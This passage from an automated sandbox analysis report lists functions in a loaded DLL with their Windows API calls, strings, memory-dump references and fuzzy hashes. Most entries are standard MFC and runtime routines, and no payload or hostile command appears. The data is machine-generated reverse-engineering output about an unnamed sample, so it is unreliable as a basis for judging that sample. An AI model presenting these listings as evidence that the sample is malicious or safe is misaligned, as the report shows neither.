Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6FEAC057

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 0f676ed95064eb1952ea83a60457d27e78bdbd5d7c23e10cd9e3c02fd3459977
Instruction ID: bf6882c759072826d2092a89bb9d53df3ff690e3997c17bb6a89033d991da160
Opcode Fuzzy Hash: 0f676ed95064eb1952ea83a60457d27e78bdbd5d7c23e10cd9e3c02fd3459977
Instruction Fuzzy Hash: 10017C30B007068BDB19AF78C85166D3EA2AF82369F30842DE4618F3D0DF73D9219B51

Function 6FEA60F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FEA60F6

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3b56854a3ea94ea5570fbf342dd6f0d7df7ef42770928b9a9678f8459d3431d8
Instruction ID: 339eee4219ad2d6a605852f5d355ee0c3ec7c1346730e2140be10a8546b7cc78
Opcode Fuzzy Hash: 3b56854a3ea94ea5570fbf342dd6f0d7df7ef42770928b9a9678f8459d3431d8
Instruction Fuzzy Hash: 0601E8B49087019FC718CF4AC89090AFBE6FFC9318F16852EA88897326C631E851CF85

Function 6FEBA6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FEB4776,00000001,?,?,?,6FEB48EF,?,?,?,6FECE848,0000000C,6FEB49AA), ref: 6FEBA709

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 75bbe5e544dceadbf7365eaf7070beb579e942729ddbef6e1f742736b8861fed
Instruction ID: d7bdc2a029ea094c834b4be359c1948195b7adbbea023d1064bf33657c32cde3
Opcode Fuzzy Hash: 75bbe5e544dceadbf7365eaf7070beb579e942729ddbef6e1f742736b8861fed
Instruction Fuzzy Hash: 06D05E325987549AEF009E756D097263FECE7867A6F244476F80DC6580E570D6A08A04

Non-executed Functions

Function 6FEA748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FEA7498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FEA76D5,?,00000000,?,00000000,00000104,00000000,?,6FECBEF4,00000000), ref: 6FEA74D6

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FEA7546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FEA756D
CharUpperW.USER32(00000000), ref: 6FEA75A0
FindFirstFileW.KERNEL32(?,?), ref: 6FEA75BC
FindClose.KERNEL32(00000000), ref: 6FEA75C8
lstrlenW.KERNEL32(?), ref: 6FEA75E6

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: b08b50657841b5c189209ef57c7aa1eb5459e254d86763d5cca513cdf25ddcd2
Instruction ID: 5b8c8af0e447f26e29c36b3aa8518feed98937f62c369d85d4383c7ba5440904
Opcode Fuzzy Hash: b08b50657841b5c189209ef57c7aa1eb5459e254d86763d5cca513cdf25ddcd2
Instruction Fuzzy Hash: 5841B3719086159BDF14DF64CD4CBAE7F78AF42318F2002EDE8299A194DB379A95CF10

Function 6FEB2932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FEB2962

Strings

@, xrefs: 6FEB2B07
AfxMDIFrame90su, xrefs: 6FEB2A03
AfxFrameOrView90su, xrefs: 6FEB2A28
@, xrefs: 6FEB2A6E

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 1d84634bb6acc6f257c91b6de10fc7a07a983b914c8ffdf66e25254e1c99a14d
Instruction ID: 3db9333bb29afc610f0453e7492bd1bdcb3f6ea9f83f8d9d6a3886328af066bb
Opcode Fuzzy Hash: 1d84634bb6acc6f257c91b6de10fc7a07a983b914c8ffdf66e25254e1c99a14d
Instruction Fuzzy Hash: 7991F271D0030DAEDB41CFA4C685BDEBFF8AF54348F20916EE918E6284EB749645C7A1

Function 6FEB3F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6FEB7C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FEB7C81
UnhandledExceptionFilter.KERNEL32(6FECA4B8), ref: 6FEB7C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6FEB7CA8
TerminateProcess.KERNEL32(00000000), ref: 6FEB7CAF

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: b9999a17af9c0dde4e3c7c9317103c1d04e0357f3052e58d54879d295ec65940
Instruction ID: 53dbb4b19edaca75055a2cf142dec8589b7609f9e7ac613d46a84a20ea1f6986
Opcode Fuzzy Hash: b9999a17af9c0dde4e3c7c9317103c1d04e0357f3052e58d54879d295ec65940
Instruction Fuzzy Hash: A2210374406B04DFDB40CF6CEA496483FB9FB8B325F60005AF4088BB94D7B055A98F41

Function 6FEA89B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FEA89FC
__snwprintf_s.LIBCMT ref: 6FEA8A2E
LoadLibraryW.KERNEL32(?), ref: 6FEA8A69

Part of subcall function 6FEB5348: __getptd_noexit.LIBCMT ref: 6FEB5348

Strings

LOC, xrefs: 6FEA89DC

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: d9162bf362fe9b995136a88a5b984dc4cc1c2826e7fe73bfccc3fa4fbc2f5a89
Instruction ID: 71772f8e375b510447afbc6b004d71c6dc2747ea49d4cbe174cfbb4ab4472cbf
Opcode Fuzzy Hash: d9162bf362fe9b995136a88a5b984dc4cc1c2826e7fe73bfccc3fa4fbc2f5a89
Instruction Fuzzy Hash: E211B771A55304ABDB509B78CD45BAE7FACAF02358F30006DE114AB1D4EB759B048761

Function 6FEB04EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FEB2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FEB2C62

GetKeyState.USER32(00000010), ref: 6FEB0514
GetKeyState.USER32(00000011), ref: 6FEB051D
GetKeyState.USER32(00000012), ref: 6FEB0526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FEB053C

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: b1985230b56f184322543e7caf43fdfc048a366c4e04650cca5a02d33a39d7ff
Instruction ID: a9cdcec328def75cdcf3d38f602dda46cf97f6cdf4b136ef79a8324c10c99170
Opcode Fuzzy Hash: b1985230b56f184322543e7caf43fdfc048a366c4e04650cca5a02d33a39d7ff
Instruction Fuzzy Hash: C7F0E93574939FA5EA2121744F01FFD0D295F81BF4F20243EAB55AA5E8CEB0E5024670

Function 6FEAE5F6 Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FEAE61F
CallWindowProcW.USER32(?,?,?,?,?), ref: 6FEAE634

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$CallNtdllProcProc_
String ID:
API String ID: 1646280189-0
Opcode ID: 45b2c48f7aa35ae5d4afbf1c6b76034233e0d3edd4d5f56ad1b6bdc6c6978fad
Instruction ID: ded108aa21e38832b7a979f16e90e380c56ae96b13c9b3aa3cad67aa7f76c954
Opcode Fuzzy Hash: 45b2c48f7aa35ae5d4afbf1c6b76034233e0d3edd4d5f56ad1b6bdc6c6978fad
Instruction Fuzzy Hash: EFF0F836104605EBCF114FA9C804DDA7FB9FF49765B149868FA598A520D733E920EB40

Function 6FEB0D95 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad396ed6323342f5f720d067790cff40122326ba0a9e7acca6ba6a4ce919255
Instruction ID: 510cfbdf7be3fdc543a2b6710b4febf70b1838e322ac78f7d4f73b7a70621974
Opcode Fuzzy Hash: 1ad396ed6323342f5f720d067790cff40122326ba0a9e7acca6ba6a4ce919255
Instruction Fuzzy Hash: 22F08C32041228FB8F025E958F04DCB3F2AEF09325B109419FB6465090C331F521DBA1

Function 6FEA8BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FEA8BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FEA8EB7,?,?), ref: 6FEA8C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FEA8C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C69
ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FEA8C94
ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FEA8CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FEA8CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FEA8CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6FEA8D3A
GetModuleFileNameW.KERNEL32(6FEA0000,?,00000105), ref: 6FEA8D7F
_memset.LIBCMT ref: 6FEA8D9F

Strings

ntdll.dll, xrefs: 6FEA8CDC
GetUserDefaultUILanguage, xrefs: 6FEA8C21
kernel32.dll, xrefs: 6FEA8C02
GetSystemDefaultUILanguage, xrefs: 6FEA8C79

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 118f16401eeaac4fe03902bb580e94bde61035cccd333d6d9253033f9603d799
Instruction ID: 27813abc082b4d8b3cd307fe778854f14c73635c6b1e3e961e80bdc0a508e8b9
Opcode Fuzzy Hash: 118f16401eeaac4fe03902bb580e94bde61035cccd333d6d9253033f9603d799
Instruction Fuzzy Hash: 1B516B70C052789ACB60DFA5DD887ADBAF4EF58314F2001EAA458E7280D7799F81CF55

Function 6FEADCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6FEADE36,?,?,?,?,?,?,?,6FEAFCC6,00000000,00000002,00000028), ref: 6FEADCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FEADD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FEADD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FEADD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FEADD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FEADD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FEADD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FEADD8E

Strings

GetMonitorInfoW, xrefs: 6FEADD81
GetMonitorInfoA, xrefs: 6FEADD88
EnumDisplayDevicesW, xrefs: 6FEADD68
MonitorFromPoint, xrefs: 6FEADD46
EnumDisplayMonitors, xrefs: 6FEADD57
MonitorFromWindow, xrefs: 6FEADD24
MonitorFromRect, xrefs: 6FEADD35
GetSystemMetrics, xrefs: 6FEADD0F
USER32, xrefs: 6FEADCEF

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: 9a85d461f9650e3fecc8fe1674a3b8d0fc46db8ac2523a8a6d80fc71f1fd1dc2
Instruction ID: 389fa42ee7792c6d99dc1b3f0e8da816f525c55e2519957d0815ee057f55effa
Opcode Fuzzy Hash: 9a85d461f9650e3fecc8fe1674a3b8d0fc46db8ac2523a8a6d80fc71f1fd1dc2
Instruction Fuzzy Hash: 012192758149619FCF106F74ADC44AE7EE6B7AB2293346A3FE421DB628C3711061CF11

Function 6FEB19AE Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FEB19B8

Part of subcall function 6FEAC050: __EH_prolog3.LIBCMT ref: 6FEAC057

CallNextHookEx.USER32(?,?,?,?), ref: 6FEB19F8

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

_memset.LIBCMT ref: 6FEB1A51
GetClassLongW.USER32(?,000000E0), ref: 6FEB1A85
SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FEB1ADA
GetClassNameW.USER32(?,?,00000100), ref: 6FEB1B20
GetWindowLongW.USER32(?,000000FC), ref: 6FEB1B46
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FEB1B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FEB1B86
SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FEB1B94
CallNextHookEx.USER32(?,00000003,?,?), ref: 6FEB1BA6
UnhookWindowsHookEx.USER32(?), ref: 6FEB1BBA

Strings

AfxOldWndProc423, xrefs: 6FEB1B56, 6FEB1B5B, 6FEB1B6D, 6FEB1B75, 6FEB1B85
#32768, xrefs: 6FEB1A63, 6FEB1A68, 6FEB1B36

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 4265692241-2141921550
Opcode ID: 4e159c78afb3440dc1278f29f5eb79d4e204c93c39eb0df401f17da9c6f7bfc6
Instruction ID: 90be0957f5cc7c67f8363c19d0dec2cd88f501c531c63c597f2a0c37f4810c1c
Opcode Fuzzy Hash: 4e159c78afb3440dc1278f29f5eb79d4e204c93c39eb0df401f17da9c6f7bfc6
Instruction Fuzzy Hash: 1351C531544725EBCB119F64CE88B9A7FB8BF06375F201199F4199A290DB349A91CBA0

Function 6FEAFBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FEB2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FEB2C62

GetParent.USER32(?), ref: 6FEAFC05
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FEAFC28
GetWindowRect.USER32(?,?), ref: 6FEAFC42
GetWindowLongW.USER32(00000000,000000F0), ref: 6FEAFC58
CopyRect.USER32(?,?), ref: 6FEAFCA5
CopyRect.USER32(?,?), ref: 6FEAFCAF
GetWindowRect.USER32(00000000,?), ref: 6FEAFCB8

Part of subcall function 6FEADE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FEADED6

CopyRect.USER32(?,?), ref: 6FEAFCD4

Strings

(, xrefs: 6FEAFC6E

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 1385303425-3887548279
Opcode ID: d92075ae5697d6456c64d6ca52296a08ae94226b5ecf7d5161a3f5f657bb0acb
Instruction ID: 7e73fe4bed88a67a9076ca821bf3dfeb3e2229b926424ccaae3f8ef0a257ceac
Opcode Fuzzy Hash: d92075ae5697d6456c64d6ca52296a08ae94226b5ecf7d5161a3f5f657bb0acb
Instruction Fuzzy Hash: A5516172904619ABDB01CBA8CD84AEEBFB9AF49314F254159F915F7280DB34E901CB94

Function 6FEBA11F Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FECE928,0000000C,6FEBA25A,00000000,00000000,?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C), ref: 6FEBA131
__crt_waiting_on_module_handle.LIBCMT ref: 6FEBA13C

Part of subcall function 6FEB5BCF: Sleep.KERNEL32(000003E8,00000000,?,6FEBA082,KERNEL32.DLL,?,?,6FEBA416,00000000,?,6FEB488C,00000000,?,?,?,6FEB48EF), ref: 6FEB5BDB
Part of subcall function 6FEB5BCF: GetModuleHandleW.KERNEL32(00000000,?,6FEBA082,KERNEL32.DLL,?,?,6FEBA416,00000000,?,6FEB488C,00000000,?,?,?,6FEB48EF,?), ref: 6FEB5BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FEBA165
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FEBA175
__lock.LIBCMT ref: 6FEBA197
InterlockedIncrement.KERNEL32(?), ref: 6FEBA1A4
__lock.LIBCMT ref: 6FEBA1B8
___addlocaleref.LIBCMT ref: 6FEBA1D6

Strings

KERNEL32.DLL, xrefs: 6FEBA12B, 6FEBA130, 6FEBA13B
$o, xrefs: 6FEBA18E
EncodePointer, xrefs: 6FEBA159
DecodePointer, xrefs: 6FEBA16D

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: $o$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-3531221583
Opcode ID: a388a804b03c0d35749bb687af5477c187832f4cee6762adf18c3d3edb0ac831
Instruction ID: 3267278096454d0e1c507f909eb579db5471ad66fdd251f67e4aad319ced42f7
Opcode Fuzzy Hash: a388a804b03c0d35749bb687af5477c187832f4cee6762adf18c3d3edb0ac831
Instruction Fuzzy Hash: BD11B4B0844B019FDB508F79CA00B5EBFE0AF45728F30855EE8AA97390CB34AA40CF55

Function 6FEA84DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FEA8503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEA8520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FEA852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FEA853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FEA8547

Strings

ActivateActCtx, xrefs: 6FEA852F
DeactivateActCtx, xrefs: 6FEA853C
CreateActCtxW, xrefs: 6FEA851A
ReleaseActCtx, xrefs: 6FEA8522
KERNEL32, xrefs: 6FEA84FE

Memory Dump Source

